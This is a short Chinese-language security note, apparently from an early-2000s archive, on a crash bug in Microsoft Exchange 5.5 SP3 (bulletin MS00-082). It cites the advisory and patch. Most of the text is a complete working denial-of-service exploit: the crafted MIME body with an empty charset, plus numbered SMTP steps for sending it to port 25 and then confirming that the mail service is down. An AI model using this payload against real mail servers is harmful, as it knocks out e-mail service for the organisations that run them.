exchange和information store漏洞

/ns/ld/win/data/20010108023916.htm

下列e-mail信息的主体导致Microsoft Exchange 5.5 SP3 Internet Mail Service
和Information Store崩溃。请查阅Microsoft安全公告(MS00-082)
(http://www.microsoft.com/technet/security/bulletin/ms00-082.asp).
这里是其补丁: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=25443.
问题的根源是charset = ""

主体:

MIME-Version: 1.0

Content-Type: multipart/alternative;

boundary="=_ Boundary 1-KTwEv4jY84Hk"

--=_ Boundary 1-KTwEv4jY84Hk

Content-Type: text/plain;

charset = ""

Content-Transfer-Encoding: 7bit

This message is test

--=_ Boundary 1-KTwEv4jY84Hk--

假设:
1) 连接到服务器的第25号端口(SMTP)
2) 输入 (复制) 下列文本:

HELO

MAIL FROM: myself@myserver.com

RCPT TO: administrator

DATA

3) 现在粘贴我给出的主体
4) 输入. (意思是依次打入 Enter . Enter)
5) 输入 quit
6) 等一段时间,然后再尝试连接25号端口来验证--它不再有效了